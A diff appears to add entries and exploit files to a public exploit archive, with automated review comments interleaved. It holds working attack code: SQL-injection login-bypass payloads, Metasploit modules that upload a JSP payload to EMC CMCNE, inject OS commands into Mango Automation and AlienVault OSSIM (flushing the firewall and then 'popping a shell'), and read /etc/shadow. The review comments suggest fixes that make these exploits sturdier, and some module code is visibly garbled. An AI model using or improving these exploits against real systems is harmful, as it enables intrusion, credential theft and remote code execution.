diff --git a/files.csv b/files.csv
index 09d41e199..fedb755d9 100644
--- a/files.csv
+++ b/files.csv
@@ -15802,6 +15802,23 @@ id,file,description,date,author,platform,type,port
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
+42683,platforms/windows/remote/42683.txt,"Mako Web Server 2.5 - Multiple Vulnerabilities",2017-09-13,hyp3rlinx,windows,remote,0
+42691,platforms/windows/remote/42691.rb,"ZScada Modbus Buffer 2.0 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42692,platforms/php/remote/42692.rb,"Trend Micro Control Manager - ImportFile Directory Traversal RCE (Metasploit)",2017-09-13,"James Fitts",php,remote,0
+42693,platforms/windows/remote/42693.rb,"Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42694,platforms/windows/remote/42694.rb,"Sielco Sistemi Winlog 2.07.16 - Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,46824
+42695,platforms/linux/remote/42695.rb,"Alienvault Open Source SIEM (OSSIM) < 4.8.0 - 'get_file' Information Disclosure (Metasploit)",2014-06-13,"James Fitts",linux,remote,0
+42696,platforms/windows/remote/42696.rb,"Motorola Netopia Netoctopus SDCS - Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,3814
+42697,platforms/linux/remote/42697.rb,"Alienvault Open Source SIEM (OSSIM) < 4.7.0 - 'get_license' Remote Command Execution (Metasploit)",2014-08-14,"James Fitts",linux,remote,0
+42698,platforms/jsp/remote/42698.rb,"Infinite Automation Mango Automation - Command Injection (Metasploit)",2017-09-13,"James Fitts",jsp,remote,0
+42700,platforms/windows/remote/42700.rb,"Fatek Automation PLC WinProladder 3.11 Build 14701 - Stack-Based Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42701,platforms/java/remote/42701.rb,"EMC CMCNE Inmservlets.war FileUploadController 11.2.1 - Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote,0
+42702,platforms/java/remote/42702.rb,"EMC CMCNE 11.2.1 - FileUploadController Remote Code Execution (Metasploit)",2017-09-13,"James Fitts",java,remote,0
+42703,platforms/windows/remote/42703.rb,"Dameware Mini Remote Control 4.0 - Username Stack Buffer Overflow (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42704,platforms/windows/remote/42704.rb,"Cloudview NMS < 2.00b - Arbitrary File Upload (Metasploit)",2017-09-13,"James Fitts",windows,remote,0
+42708,platforms/linux/remote/42708.rb,"Alienvault OSSIM av-centerd Util.pm sync_rserver - Command Execution (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
+42709,platforms/linux/remote/42709.rb,"Alienvault OSSIM av-centerd 4.7.0 - 'get_log_line' Command Injection (Metasploit)",2017-09-13,"James Fitts",linux,remote,40007
+42711,platforms/windows/remote/42711.txt,"Microsoft Windows .NET Framework - Remote Code Execution",2017-09-13,Voulnet,windows,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38448,3 +38465,30 @@ id,file,description,date,author,platform,type,port
42661,platforms/php/webapps/42661.txt,"FoodStar 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
42662,platforms/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
42663,platforms/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0
+42667,platforms/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42668,platforms/php/webapps/42668.txt,"ICMLM 2.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42669,platforms/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42670,platforms/php/webapps/42670.txt,"ICAuction 2.2 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42671,platforms/php/webapps/42671.txt,"ICDoctor Appointment 1.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42672,platforms/php/webapps/42672.txt,"ICRestaurant software 1.4 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42673,platforms/php/webapps/42673.txt,"ICDutchAuction 1.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42674,platforms/php/webapps/42674.txt,"ICAutosales 2.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42675,platforms/php/webapps/42675.txt,"ICTraveling 2.2 - Authentication Bypass",2017-09-13,"Ihsan Sencan",php,webapps,0
+42677,platforms/php/webapps/42677.txt,"ICStudents 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42676,platforms/php/webapps/42676.txt,"ICClassifieds 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42678,platforms/php/webapps/42678.txt,"ICSurvey 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42679,platforms/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42680,platforms/php/webapps/42680.txt,"IC-T-Shirt 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42681,platforms/php/webapps/42681.txt,"ICProductConfigurator 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42682,platforms/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42684,platforms/php/webapps/42684.txt,"ICCallLimousine 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42685,platforms/php/webapps/42685.txt,"ICProjectBidding 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42686,platforms/php/webapps/42686.txt,"ICDental Clinic 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42687,platforms/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",aspx,webapps,0
+42688,platforms/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42689,platforms/php/webapps/42689.txt,"ICSiteBuilder 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0
+42690,platforms/asp/webapps/42690.txt,"ICAffiliateTracking 1.1 - Authentication Bypass",2017-09-13,"Ihsan Sencan",asp,webapps,0
+42699,platforms/windows/webapps/42699.rb,"Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
+42705,platforms/windows/webapps/42705.rb,"Carlo Gavazzi Powersoft 2.1.1.1 - Directory Traversal File Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
+42706,platforms/windows/webapps/42706.rb,"Carel PlantVisor 2.4.4 - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0
+42707,platforms/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps,0
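Review bot: The rows at L42-L43 are out of id order (42677 is listed before 42676) while every other row added in this hunk ascends by id. If the index is produced by a generator, its sort step is the place to look; otherwise the two lines should simply be swapped so the file stays monotonic for tools that bisect on id.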
diff --git a/platforms/asp/webapps/42690.txt b/platforms/asp/webapps/42690.txt
new file mode 100755
index 000000000..bf712e162
--- /dev/null
+++ b/platforms/asp/webapps/42690.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Affiliate Tracking Script 1.1 - Authentication Bypass
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/affiliates-tracking-script.htm
+# Demo: http://www.icloudcenter.com/demos/icaffiliatetracking/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/icaffiliatetracking/adminlogin.asp
+#
+# User: 'or 1=1 or ''=' Pass: anything
+#
+# Etc..
+# # # # #
\ No newline at end of file
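Review bot: The Description at L83 ("inject sql commands....") is the shared template line, while the title at L67 and the files.csv entry classify this advisory as an authentication bypass, so the two statements do not agree. A description that matches the finding, e.g. `# Description: The admin login form's credential check does not sanitize the username, so crafted input bypasses authentication.`, would make the header self-consistent. The trailing "Etc.." at L91 carries no information and could be dropped.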
diff --git a/platforms/aspx/webapps/42687.txt b/platforms/aspx/webapps/42687.txt
new file mode 100755
index 000000000..b5b70731e
--- /dev/null
+++ b/platforms/aspx/webapps/42687.txt
@@ -0,0 +1,25 @@
+# # # # #
+# Exploit Title: Real Estate Marketplace Site ASP.NET Script 1.1 - SQL Injection
+# Dork: N/A
+# Date: 13.09.2017
+# Vendor Homepage: http://www.icloudcenter.com/
+# Software Link: http://www.icloudcenter.com/real-estate-marketplace-site.htm
+# Demo: http://www.icloudcenter.com/demos/icestatemarket/
+# Version: 1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+#
+# Proof of Concept:
+#
+# http://localhost/[PATH]/details.aspx?id=[SQL]
+#
+# Etc..
+# # # # #
\ No newline at end of file
diff --git a/platforms/java/remote/42701.rb b/platforms/java/remote/42701.rb
new file mode 100755
index 000000000..42d682f7b
--- /dev/null
+++ b/platforms/java/remote/42701.rb
@@ -0,0 +1,78 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'EMC CMCNE Inmservlets.war FileUploadController Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a file upload vulnerability found in EMC
+ Connectrix Manager Converged Network Edition <= 11.2.1. The file
+ upload vulnerability is triggered when sending a specially crafted
+ filename to the FileUploadController servlet found within the
+ Inmservlets.war archive. This allows the attacker to upload a
+ specially crafted file which leads to remote code execution in the
+ context of the server user.
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'ZDI', '13-280' ],
+ [ 'CVE', '2013-6810' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'Arch' => ARCH_JAVA,
+ 'Targets' =>
+ [
+ [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Dec 18 2013'))
+
+ register_options([
+ Opt::RPORT(80)
+ ], self.class)
+ end
+
+ def exploit
+
+ peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
+ deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
+ jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
+ @jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+
+ data = Rex::MIME::Message.new
+ data.add_part("#{jsp}", nil, nil, "form-data; name=\"ftproot\"; filename=\"#{deploy}#{@jsp_name}\"")
+
+ post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
+
+ print_status("#{peer} - Uploading the JSP Payload...")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri("inmservlets", "FileUploadController"),
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data,
+ 'headers' => {
+ 'ROOTDIR' => "ftproot"
+ }
+ })
+
+ if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
+ print_good("File uploaded successfully!")
+ print_status("Executing '#{@jsp_name}' now...")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri("dcm-client", "#{@jsp_name}")
+ })
+ else
+ print_error("Does not look like the files were uploaded to #{peer}...")
+ end
+
+ end
+
+end
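Review bot: `res.code` at L196 is dereferenced without a nil check, but `send_request_cgi` returns nil on a timeout or connection failure, so an unreachable host ends the module with a NoMethodError instead of reaching the `print_error` branch at L204. `if res && res.code == 200 && res.body =~ /SUCCESSFULLY UPLOADED FILES!/` covers both cases; the same guard is missing at L277 in 42702.rb and at L405 in 42698.rb, where `res.body` is read from a `send_request_raw` result the same way. The local `peer` at L175 also shadows the `peer` helper that HttpClient already provides and that 42698.rb uses directly at L343, so the assignment can go.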
diff --git a/platforms/java/remote/42702.rb b/platforms/java/remote/42702.rb
new file mode 100755
index 000000000..59e1fca40
--- /dev/null
+++ b/platforms/java/remote/42702.rb
@@ -0,0 +1,78 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'EMC CMCNE FileUploadController Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a fileupload vulnerability found in EMC
+ Connectrix Manager Converged Network Edition <= 11.2.1. The file
+ upload vulnerability is triggered when sending a specially crafted
+ filename to the FileUploadController servlet. This allows the
+ attacker to upload a malicious jsp file to anywhere on the remote
+ file system.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'james fitts' ],
+ 'References' =>
+ [
+ [ 'ZDI', '13-279' ],
+ [ 'CVE', '2013-6810' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'win',
+ 'Arch' => ARCH_JAVA,
+ 'Targets' =>
+ [
+ [ 'EMC CMCNE 11.2.1 / Windows Server 2003 SP2 ', {} ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Dec 18 2013'))
+
+ register_options([
+ Opt::RPORT(80)
+ ], self.class)
+ end
+
+ def exploit
+
+ peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"
+ deploy = "..\\..\\..\\deploy\\dcm-client.war\\"
+ jsp = payload.encoded.gsub(/\x0d\x0a/, "").gsub(/\x0a/, "")
+ @jsp_name = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+
+ data = Rex::MIME::Message.new
+ data.add_part("#{jsp}", "application/octet-stream", nil, "form-data; name=\"source\"; filename=\"#{deploy}#{@jsp_name}\"")
+ data.add_part("#{rand_text_alpha_upper(5)}", nil, nil, "form-data; name=\"driverFolderName\"")
+
+ post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")
+
+ print_status("#{peer} - Uploading the JSP Payload...")
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => normalize_uri("HttpFileUpload", "FileUploadController.do"),
+ 'ctype' => "multipart/form-data; boundary=#{data.bound}",
+ 'data' => post_data
+ })
+
+ if res.code == 200 and res.body =~ /SUCCESSFULLY UPLOADED FILES!/
+ print_good("File uploaded successfully!")
+ print_status("Executing '#{@jsp_name}' now...")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri("dcm-client", "#{@jsp_name}")
+ })
+
+ else
+ print_error("Does not look like the files were uploaded to #{peer}...")
+ end
+
+
+ end
+
+end
diff --git a/platforms/jsp/remote/42698.rb b/platforms/jsp/remote/42698.rb
new file mode 100755
index 000000000..3898fa630
--- /dev/null
+++ b/platforms/jsp/remote/42698.rb
@@ -0,0 +1,114 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Infinite Automation Mango Automation Command Injection',
+ 'Description' => %q{
+ This module exploits a command injection vulnerability found in Infinite
+ Automation Systems Mango Automation v2.5.0 - 2.6.0 beta (builds prior to
+ 430).
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2015-7901' ],
+ [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-15-300-02' ]
+ ],
+ 'DisclosureDate' => 'Oct 28 2015'))
+
+ register_options(
+ [
+ Opt::RPORT(8080),
+ OptString.new('TARGETURI', [ false, 'Base path to Mango Automation', '/login.htm']),
+ OptString.new('CMD', [ false, 'The OS command to execute', 'calc.exe']),
+ OptString.new('USER', [true, 'The username to login with', 'admin']),
+ OptString.new('PASS', [true, 'The password to login with', 'admin']),
+ ], self.class )
+ end
+
+ def do_login(user, pass)
+ uri = normalize_uri(target_uri.path)
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri
+ })
+
+ if res.nil?
+ vprint_error("#{peer} - Connection timed out")
+ return :abort
+ end
+
+ cookie = res.headers['Set-Cookie']
+
+ print_status("Attempting to login with credentials '#{user}:#{pass}'")
+
+ res = send_request_cgi({
+ 'method' => 'POST',
+ 'uri' => uri,
+ 'cookie' => cookie,
+ 'vars_post' => {
+ 'username' => user,
+ 'password' => pass,
+ }
+ })
+
+ if res.nil?
+ vprint_error("#{peer} - Connection timed out")
+ return :abort
+ end
+
+ location = res.headers['Location']
+ if res and res.headers and (location = res.headers['Location']) and location =~ /data_point_details.shtm/
+ print_good("#{peer} - Successful login: '#{user}:#{pass}'")
+ else
+ vprint_error("#{peer} - Bad login: '#{user}:#{pass}'")
+ return
+ end
+
+ return cookie
+
+ end
+
+ def run
+ cookie = do_login(datastore['USER'], datastore['PASS'])
+
+ data = "callCount=1&"
+ data << "page=%2Fevent_handlers.shtm&"
+ data << "httpSessionId=%0D%0A&"
+ data << "scriptSessionId=26D579040C1C11D2E21D1E5F321094E5866&"
+ data << "c0-scriptName=EventHandlersDwr&"
+ data << "c0-methodName=testProcessCommand&"
+ data << "c0-id=0&"
+ data << "c0-param0=string:c:\\windows\\system32\\cmd.exe /c #{datastore['CMD']}&"
+ data << "c0-param1=string:15&"
+ data << "batchId=24"
+
+ res = send_request_raw({
+ 'method' => 'POST',
+ 'uri' => normalize_uri("dwr", "call", "plaincall", "EventHandlersDwr.testProcessCommand.dwr"),
+ 'cookie' => cookie.split(";")[0],
+ 'ctype' => "application/x-www-form-urlencoded",
+ 'headers' => {
+ 'Origin' => 'null',
+ 'Upgrade-Insecure-Requests' => 1,
+ 'Connection' => "keep-alive"
+ },
+ 'data' => data,
+ }, 5)
+
+ if res.body =~ /org.directwebremoting.extend.MarshallException/
+ print_error("Something went wrong...")
+ puts res.body
+ elsif res.body =~ /Check your Tomcat console for process output/
+ print_good("Command executed successfully")
+ end
+
+ end
+end
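Review bot: `do_login` returns `:abort` on a timeout (L344, L363) and nil on a failed login (L371), yet `run` calls `cookie.split(";")` at L395 on whatever comes back, so both failure paths die with a NoMethodError on Symbol or NilClass rather than stopping cleanly. A guard after L379 such as `return unless cookie.is_a?(String)` keeps the module from issuing the second request without a session. At L366-L367 `location` is assigned twice and the `res and res.headers` test repeats the nil check already made at L361; `if (location = res.headers['Location']) && location =~ /data_point_details.shtm/` is sufficient. `puts res.body` at L407 bypasses the framework's output channel; `print_line(res.body)` is the module convention and keeps the output attributable in logs.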
diff --git a/platforms/linux/remote/42695.rb b/platforms/linux/remote/42695.rb
new file mode 100755
index 000000000..0963c2ce2
--- /dev/null
+++ b/platforms/linux/remote/42695.rb
@@ -0,0 +1,119 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize
+ super(
+ 'Name' => 'Alienvault OSSIM av-centerd Util.pm get_file Information Disclosure',
+ 'Description' => %q{
+ This module exploits an information disclosure vulnerability found within the get_file
+ function in Util.pm. The vulnerability exists because of an unsanitized $r_file parameter
+ that allows for the leaking of arbitrary file information.
+ },
+ 'References' =>
+ [
+ [ 'CVE', '2014-4153' ],
+ [ 'ZDI', '14-207' ],
+ [ 'URL', 'http://forums.alienvault.com/discussion/2806' ],
+ ],
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'DisclosureDate' => 'Jun 13 2014')
+
+ register_options([
+ Opt::RPORT(40007),
+ OptBool.new('SSL', [true, 'Use SSL', true]),
+ OptString.new('FILE', [ false, 'This is the file to download', '/etc/shadow'])
+ ], self.class)
+
+ end
+
+ def run
+
+ soap = "\r\n"
+ soap += "\r\n"
+ soap += "\r\n"
+ soap += "\r\n"
+ soap += "All\r\n"
+ soap += "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2\r\n"
+ soap += "#{datastore['RHOST']}\r\n"
+ soap += "#{Rex::Text.rand_text_alpha(4 + rand(4))}\r\n"
+ soap += "#{datastore['FILE']}\r\n"
+ soap += "\r\n"
+ soap += "\r\n"
+ soap += "\r\n"
+
+ res = send_request_cgi(
+ {
+ 'uri' => '/av-centerd',
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => soap,
+ 'headers' => {
+ 'SOAPAction' => "\"AV/CC/Util#get_file\""
+ }
+ }, 20)
+
+ if res && res.code == 200
+ print_good("Dumping contents of #{datastore['FILE']} now...")
+ data = res.body.scan(/(?<=xsi:type="soapenc:Array">- )[\S\s]+<\/item>
- /)
+ puts data[0].split("<")[0]
+ else
+ print_bad("Something went wrong...")
+ end
+
+ end
+
+end
+__END__
+
+/usr/share/alienvault-center/lib/AV/CC/Util.pm
+
+sub get_file {
+ my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $r_file )
+ = @_;
+ my $file_content;
+
+ verbose_log_file(
+ "GET FILE : Received call from $uuid : ip source = $admin_ip, hostname = $hostname :($funcion_llamada,$nombre,$r_file)"
+ );
+
+ if ($r_file =~ /[;`\$\<\>\|]/) {
+ console_log_file("Not allowed r_file: $r_file in get_file\n");
+ my @ret = ("Error");
+ return \@ret;
+ }
+
+ if ( !-f "$r_file" ) {
+ #my @ret = ("Error");
+ verbose_log_file("Error file $r_file not found!");
+ # Return empty file if not exists
+ my @ret = ( "", "d41d8cd98f00b204e9800998ecf8427e", "$systemuuid" );
+ return \@ret;
+ }
+
+ my $md5sum = `md5sum $r_file | awk {'print \$1'}` if ( -f "$r_file" );
+
+ if ( open( my $ifh, $r_file ) ) {
+
+ binmode($ifh);
+ $file_content = do { local $/; <$ifh> };
+ close($ifh);
+
+ my @ret = ( "$file_content", "$md5sum", "$systemuuid" );
+ return \@ret;
+
+ }
+ else {
+ my @ret = ("Error");
+ verbose_log_file("Error file $r_file not found!");
+ return \@ret;
+
+ }
+
+}
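Review bot: The SOAP body assembled at L454-L465 consists only of line terminators and bare text values (`All`, the uuid, `RHOST`, `FILE`) with no XML elements, so as archived the module cannot form a valid envelope; the markup looks to have been stripped in transcription, and L821-L831 in 42708.rb shows the same pattern. At L480-L481 the regex literal is split across two lines with the continuation beginning with `-`, which reads like a diff marker and should be checked against the original source before anyone relies on this copy. `data[0].split("<")` at L482 raises on nil whenever a 200 response does not match the scan; `if data.empty? then print_bad("Unexpected response body") else ...` keeps the failure explicit.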
diff --git a/platforms/linux/remote/42697.rb b/platforms/linux/remote/42697.rb
new file mode 100755
index 000000000..06ec61dc9
--- /dev/null
+++ b/platforms/linux/remote/42697.rb
@@ -0,0 +1,237 @@
+require 'msf/core'
+require 'rexml/document'
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include REXML
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Alienvault OSSIM av-centerd Command Injection get_license',
+ 'Description' => %q{
+ This module exploits a command injection flaw found in the get_license
+ function found within Util.pm. The vulnerability is triggered due to an
+ unsanitized $license_type parameter passed to a string which is then
+ executed by the system.
+ },
+ 'Author' => [ 'james fitts' ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2014-5210' ],
+ [ 'ZDI', '14-294' ],
+ [ 'BID', '69239' ],
+ [ 'URL', 'https://www.alienvault.com/forums/discussion/2690' ]
+ ],
+ 'Privileged' => true,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'DefaultOptions' =>
+ {
+ 'SSL' => true,
+ },
+ 'Payload' =>
+ {
+ 'Compat' => {
+ 'RequiredCmd' => 'perl netcat-e openssl python gawk'
+ }
+ },
+ 'DefaultTarget' => 0,
+ 'Targets' =>
+ [
+ ['Alienvault <= 4.7.0',{}]
+ ],
+ 'DisclosureDate' => 'Aug 14 2014'))
+
+ register_options([Opt::RPORT(40007)], self.class)
+ end
+
+ def check
+ version = ""
+ res = send_soap_request("get_dpkg")
+
+ if res &&
+ res.code == 200 &&
+ res.headers['SOAPServer'] &&
+ res.headers['SOAPServer'] =~ /SOAP::Lite/ &&
+ res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/
+
+ version = $1
+ end
+
+ if version.empty? || version >= "4.7.0"
+ return Exploit::CheckCode::Safe
+ else
+ return Exploit::CheckCode::Appears
+ end
+ end
+
+ def build_soap_request(method, pass)
+ xml = Document.new
+ xml.add_element(
+ "soap:Envelope",
+ {
+ "xmlns:xsi" => "http://www.w3.org/2001/XMLSchema-instance",
+ "xmlns:soapenc" => "http://schemas.xmlsoap.org/soap/encoding/",
+ "xmlns:xsd" => "http://www.w3.org/2001/XMLSchema",
+ "soap:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/",
+ "xmlns:soap" => "http://schemas.xmlsoap.org/soap/envelope/"
+ })
+
+ body = xml.root.add_element("soap:Body")
+ m = body.add_element(method, { 'xmlns' => "AV/CC/Util" })
+
+ args = []
+ args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})
+ args[0].text = "All"
+
+ args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})
+ args[1].text = "423d7bea-cfbc-f7ea-fe52-272ff7ede3d2"
+
+ args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})
+ args[2].text = "#{datastore['RHOST']}"
+
+ args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})
+ args[3].text = "#{rand_text_alpha(4 + rand(4))}"
+
+ args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})
+ args[4].text = "#{rand_text_alpha(4 + rand(4))}"
+
+ if pass == '0'
+ args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
+ perl_payload = "system(decode_base64"
+ perl_payload += "(\"#{Rex::Text.encode_base64("iptables --flush")}\"))"
+ args[5].text = "|perl -MMIME::Base64 -e '#{perl_payload}';"
+ elsif pass == '1'
+ args[5] = m.add_element("c-gensym13", {'xsi:type' => 'xsd:string'})
+ perl_payload = "system(decode_base64"
+ perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
+ args[5].text = "|perl -MMIME::Base64 -e '#{perl_payload}';"
+ end
+
+ xml.to_s
+ end
+
+ def send_soap_request(method, timeout=20, action)
+ if action == 'disable'
+ soap = build_soap_request(method, '0')
+ elsif action == 'pop_shell'
+ soap = build_soap_request(method, '1')
+ end
+
+ res = send_request_cgi({
+ 'uri' => '/av-centerd',
+ 'method' => 'POST',
+ 'ctype' => 'text/xml; charset=UTF-8',
+ 'data' => soap,
+ 'headers' => {
+ 'SOAPAction' => "\"AV/CC/Util##{method}\""
+ }
+ }, timeout)
+
+ res
+ end
+
+ def exploit
+ print_status("Disabling firewall...")
+ send_soap_request("get_license", 1, "disable")
+
+ print_status("Popping shell...")
+ send_soap_request("get_license", 1, "pop_shell")
+ end
+end
+__END__
+
+/usr/share/alienvault-center/lib/AV/CC/Util.pm
+
+sub get_license() {
+ my ( $funcion_llamada, $nombre, $uuid, $admin_ip, $hostname, $license, $license_type ) = @_;
+ verbose_log_file(
+ "LICENSE $license_type:Received call from $uuid : ip source = $admin_ip, hostname = $hostname:($funcion_llamada,$nombre,$license,$license_type)"
+ );
+
+ my $deb='/usr/share/ossim-installer/temp/avl.deb';
+ my $header='/usr/share/ossim-installer/temp/header';
+
+ unlink $deb if ( -f $deb ); #delete previous file if found
+ unlink $header if ( -f $header ); #delete previous file if found
+
+ my $user_agent_uuid = AV::uuid::get_uuid;
+ $SIG{CHLD} = 'DEFAULT';
+ my $license_encoded = uri_escape($license);
